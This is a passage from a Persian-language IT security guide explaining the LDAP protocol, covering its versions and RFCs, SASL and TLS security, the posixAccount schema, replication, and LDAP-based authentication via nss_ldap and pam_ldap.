‫ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺩﻭ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺍﺯ ‪ LDAP‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ LDAPv2 .‬ﻛﻪ ﺳﺎﻝ ‪ ۱۹۹۵‬ﺩﺭ ‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۱۷۷۷‬ﺗﻮﺻﻴﻒ ﺷﺪﻩ‪ ،‬ﻣﮑﺎﻧﻴﺰﻡ‬
‫ﺍﻣﻨﻴﺘﻲ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻥ ﺩﺭ ﺗﻌﺎﻣـﻞ ﺑـﺎ ‪ Kerberos‬ﺑﺎﺷـﺪ‪ LDAPv3 .‬ﻛـﻪ ﺩﺭ‬
‫‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۲۲۵۱‬ﺗﻮﺻﻴﻒ ﺷﺪﻩ ﺍﺯ ‪ ١٨٠SASL‬ﻫﻢ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ‪ SASL .‬ﭼﻨﺪ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ )ﺍﺯ ﺟﻤﻠﻪ ‪ (!Kerberos‬ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﻫﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﺘﻦﺑﺎﺯ ﻭ ﭘﺮ ﺍﺳﺘﻔﺎﺩﺓ ‪ (OpenLDAP 2.x) LDAPv3‬ﻭ ﻫـﻢ‬
‫ﭘﺮﺍﺳﺘﻔﺎﺩﻩﺗﺮﻳﻦ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﺠﺎﺭﻱ )‪ Active Directory‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ،‬ﺩﺭ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺑﺎ ‪ Windows 2000‬ﺁﻏﺎﺯ ﺷﺪ(‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪SSL/TLS‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﻛﻞ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ -‬ﺍﺯ ﺟﻤﻠﻪ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ -‬ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫‪ LDAP‬ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ‪ LDAP‬ﺑـﺮﺍﻱ‬
‫ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ‪ ،‬ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ‪ ،‬ﻭ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ ﺩﺭ ﻣـﻮﺭﺩ‬
‫‪ LADP‬ﺳﺨﻦ ﻣﻲﮔﻮﻳﻴﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﺎﻳﺔ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺷﻜﻞ ﺩﻫـﺪ‪ ،‬ﻭ ﻧﻴـﺰ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻛـﻪ ﺑﻄـﻮﺭ‬
‫ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ‪ -‬ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windwos‬ﻭ ‪ - Linux‬ﺑﺮﺍﻱ ﺑﺮﺁﻭﺭﺩﻩ ﻛﺮﺩﻥ ﺍﻳﻦ ﺍﻫﺪﺍﻑ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬

‫ﭘﺮﻭﺗﻜﻞ ‪LDAP‬‬

‫ﺍﻃﻼﻋﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﺑﻪ ﺷﻜﻞ ﻳﻚ ﺩﺭﺧﺖ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﻩ ‪ -‬ﻛﻪ ﻫﺮﻳﻚ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻃﺒﻘﺔ ﺍﺷـﻴﺎ ﻭ ﺷـﺎﻣﻞ ﺻـﻔﺎﺗﻲ‬
‫ﺑﺮﺍﻱ ﻣﻘﺎﺩﻳﺮ ﺧﻮﺩ ﻫﺴﺘﻨﺪ ‪ -‬ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﺮ ﻗﻠﻢ ﺩﺍﺩﻩ ﺷﺎﻣﻞ ﻳﻚ ﺻﻔﺖ ﺑﻪ ﻧﺎﻡ "‪) "cn‬ﻧﺎﻡ ﻣـﺸﺘﺮﻙ(‪ ١٨١‬ﺍﺳﺖ ﻛـﻪ ﺁﻧـﺮﺍ ﺍﺯ ﺳـﺎﻳﺮ‬
‫ﺍﻗﻼﻡ ﺑﺎ ﭘﺪﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻫﻤﺎﻥ ﺩﺭﺧﺖ ﻣﺘﻤﺎﻳﺰ ﻣﻲﺳﺎﺯﺩ‪.‬‬

‫‪180 Simple Authentication and Security Layer, RFC 2222‬‬


‫‪181 Common Name‬‬
‫‪٣٤٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﻩ ﻣﺘﻌﻠﻖ ﺑﻪ ﻃﺒﻘﻪ ﺷﻲﺀ "‪ "posixAccount‬ﺷﺎﻣﻞ ﺻﻔﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻡ ﻛﺎﻣﻞ ﻛﺎﺭﺑﺮ )‪ ،(cn‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﺑـﺮﺍﻱ‬
‫ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ )‪ ،(uid‬ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮ ﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﮔﺮﻭﻩ )‪ uidNumber‬ﻭ ‪ ،(gidNumber‬ﺩﺍﻳﺮﻛﺘـﻮﺭﻱ ﺧﺎﻧـﻪ )‪،(homeDirectory‬‬
‫ﭘﻮﺳﺘﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ )‪ (loginShell‬ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﺍﺻﻄﻼﺣﺎﺕ ‪ ،LDAP‬ﻳﻚ ﺷﻤﺎ‪ ١٨٢‬ﺑﻪ ﻣﻌﻨﺎﻱ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﺍﺷﻴﺎ‪ ١٨٣‬ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘـﻲ ﻭ ﺗﻌـﺎﺭﻳﻒ ﺻـﻔﺎﺕ ﺑـﻪ ﻫـﻢ‬
‫ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ‪ .‬ﮔﻮﻧﺔ ﺷﻲﺀ ‪ posixAccount‬ﺩﺭ ﺷﻤﺎﻱ ﺳﺮﻭﻳﺲ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ )‪ (nis.schema‬ﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪ LDAP‬ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ‪ -‬ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧـﺪﺓ ‪ LDAP‬ﺗﻘﺎﺿـﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪LDAP‬‬
‫ﻣﻲﻓﺮﺳﺘﺪ ﻭ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻘﺎﺿﺎﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻧﺠﺎﻡ ﺟﺴﺘﺠﻮ‪ ،‬ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳـﻚ‬
‫ﻳﺎ ﺑﻴﺸﺘﺮ ﺻﻔﺎﺕ ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﺓ ﺧﺎﺹ‪ ،‬ﻭ ﻳﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳﻚ ﺯﻳﺮ ﺩﺭﺧﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﺎﻓﻈﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻔﺮﺳﺘﻨﺪ‪.‬‬

‫ﺟﺎﻣﻌﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ‬


‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺪﺭﻥ ‪) LDAP‬ﻣﺜﻞ ‪ Active Directory‬ﻳـﺎ ‪ (OpenLDAP 2.x‬ﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﻣﻬﻢ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺟﺎﻣﻌﻴـﺖ ﺩﺍﺩﻩ ﻭ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ‪:‬‬

‫ﺟﺎﻣﻌﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩ‬


‫‪١٨٤‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺗﺼﺎﻻﺕ ﺍﻳﻤﻦﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ‪ TLS‬ﺭﺍ ﺑﭙﺬﻳﺮﺩ‪ ،‬ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻧﺘﻬـﺎ ﺑـﻪ ﺍﻧﺘﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻌـﺎﻣﻼﺕ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ‪ -‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ TLS ،‬ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻣﻲﺳﺎﺯﺩ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬


‫ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ‪ ،TLS‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬
‫ﺍﻣﻀﺎ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ LDAP‬ﺑﺎ ﺁﻥ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺎ ﻫﻤﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﻛـﻪ ﻣـﻲﺧﻮﺍﺳـﺘﻨﺪ‬
‫ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬


‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ LDAP‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ‪ TLS‬ﺑﺨﻮﺍﻫﻨـﺪ‪ ،‬ﺗـﺎ ﺗـﻀﻤﻴﻦ ﻛﻨﻨـﺪ ﻛـﻪ ﺗﻨﻬـﺎ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ ﻣﺠﺎﺯ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ query‬ﺑﻔﺮﺳﺘﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﻪ ﺭﻭﺯ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺗﻜﺜﻴﺮ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻡ ﻣﺨﺎﺯﻥ ﺩﺍﺩﺓ ‪ LDAP‬ﺭﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺗﻜﺜﻴﺮ ﻛﻨﺪ ﺗـﺎ ﺩﺭﺻـﻮﺭﺕ ﺧـﺮﺍﺏ ﺷـﺪﻥ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ‪ LDAP‬ﺍﺯ ﺩﺳﺖ ﻧﺮﻭﺩ‪.‬‬
‫‪ LDAP‬ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﻗﺪﺭﺗﻤﻨﺪ ﻭ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮ ﺑﺮﺍﻱ ‪ NIS‬ﻭ ‪ NIS+‬ﺍﺳﺖ‪ .‬ﺩﺭ ﻛﻨﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‪ ،‬ﺍﺯ ﻣﺰﺍﻳـﺎﻱ‬
‫ﺍﺻﻠﻲ ‪ LDAP‬ﺗﻮﺍﻧﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻭ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻭﺟﻮﺩ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤـﻦﺷـﺪﻩ‬
‫ﺑﻮﺳﻴﻠﺔ ‪ TLS‬ﺍﺳﺖ‪ .‬ﺍﺷﻜﺎﻝ ﺍﺻـﻠﻲ ‪ LDAP‬ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ ﺁﻥ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩﺗـﺮ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻳـﻚ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺳﺎﺩﻩﺳﺎﺯﻱ ﺭﺍﻫﺒﺮﻱ ‪ LDAP‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬

‫‪182 Schema‬‬
‫‪183 Object Classes‬‬
‫‪184 End-to-End Encryption‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٤٤‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ‪LDAP‬‬

‫‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۲۳۰۷‬ﺷﻴﻮﻩﺍﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ LDAP‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﺗﻮﺻﻴﻒ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻳـﻦ ‪ RFC‬ﻳـﻚ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺁﻥ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﻳﻚ ﻃﺮﺡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ‬
‫)‪ (nis.schema‬ﺩﺭ ‪ OpenDAP 2.x‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﻃـﺮﺡ ﻳـﺎﺩ ﺷـﺪﻩ "ﮔﻮﻧـﻪﻫـﺎﻱ ﺍﺷـﻴﺎ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫)‪ posixAccount‬ﻭ ‪ ،(shadowAccount‬ﮔﺮﻭﻫﻬﺎ )‪ ،(posixGroup‬ﺧﺪﻣﺎﺕ )‪ ،(ipService‬ﭘﺮﻭﺗﻜﻠﻬﺎ )‪ ،(ipProtocol‬ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺗﻮﺍﺑـﻊ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ )‪ ،(oncRPS‬ﻣﻴﺰﺑﺎﻧﻬﺎ )‪ ،(ipHost‬ﺷﺒﻜﻪﻫﺎ )‪ ،(ipNetworks‬ﮔﺮﻭﻩﻫـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ‪ (nisObject ،nisMap ،nisNetgroup) NIS‬ﻭ ﺳـﺎﻳﺮ‬
‫ﻣﻮﺍﺭﺩ ﺭﺍ ﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻫﺮ ﺳﺮﻭﻳﺴﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﺗﻌﺎﻣـﻞ ﺑـﺎ ‪ LDAP‬ﻣﺠـﺪﺩﹰﺍ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ؛ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﺸﺎﺑﻪ ﺭﻭﻧـﺪ‬
‫"‪ "kerberizing‬ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ‪ Kerberos‬ﻻﺯﻡ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻧﻈﻴـﺮ ‪ Microsoft Windows‬ﻛـﻪ‬
‫ﻫﻤﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻭﺍﺳﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ‪ ١٨٥‬ﻣﻨﺘﺸﺮﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩ ﻣﻲﻛﻨﺪ ﺳـﺎﺩﻩ ﺍﺳـﺖ ‪ -‬ﺍﻣـﺎ ﻫﻨـﻮﺯ ﻫـﻢ‬
‫ﺑﺎﺯﻧﻮﻳﺴﻲ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻜﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻻﺯﻡ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﭼﻨﺪﺍﻥ ﻛﺎﺭﺁ ﻧﻴﺴﺖ‪ .‬ﺩﺭﻋﻮﺽ ﺩﻭ ﺭﻭﺵ ﺟﺎﻳﮕﺰﻳﻦ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﻛـﻪ ﺑﻌﻨـﻮﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﻣﺘﻦﺑﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ ‪ PADL Software‬ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻭ ﺩﺭ ﺑﻴﺸﺘﺮ ﺗﻮﺯﻳﻌﻬﺎﻱ ‪ Linux‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺭﻭﺵ ﺍﻭﻝ ‪nss_ldap‬‬
‫ﺍﺳﺖ ﻛﻪ ﺗﻮﺍﺑﻊ ﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ‪) C‬ﻣﺜﻞ )(‪ (getpwentc‬ﺭﺍ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺼﻮﺭﺕ ﻧﺎﻣﺮﺋﻲ ﺍﺯ ﻳﻚ ﭘﺎﻳﮕﺎﻩ‬
‫ﺩﺍﺩﻩ ‪ LDAP‬ﺑﺠﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺤﻠﻲ‪ ،NIS ،‬ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻗﺒﻞ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺗﻮﺍﺑـﻊ ﺭﺍ ﺑـﺮﺍﻱ‬
‫‪١٨٧‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺍﻃﻼﻋﺎﺕ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻓﺎﻳﻞ ﺗﻌﻮﻳﺾ ﻧﺎﻡ ﺳﺮﻭﻳﺲ‪) ١٨٦‬ﻣﻌﻤﻮ ﹰﻻ ‪ (/etc/nsswitch.conf‬ﻣﺠﺎﺯ ﻣﻲﺩﺍﻧﺴﺘﻨﺪ‪.‬‬
‫ﺭﻭﺵ ﺩﻭﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭼـﺎﺭﭼﻮﺏ ‪ PAM‬ﺩﺭ ﺑﺨـﺶ ﺑﻌـﺪﻱ ﺑﺤـﺚ ﻣـﻲﺷـﻮﺩ‪ .‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ‪ LDAP‬ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣـﺎﺟﻮﻝ ‪،PAM‬‬
‫‪ ،pam_ldap‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻼﻑ ‪ pam_ldap ،libnss_ldap‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ‪ LDAP‬ﺗﻨﻬﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
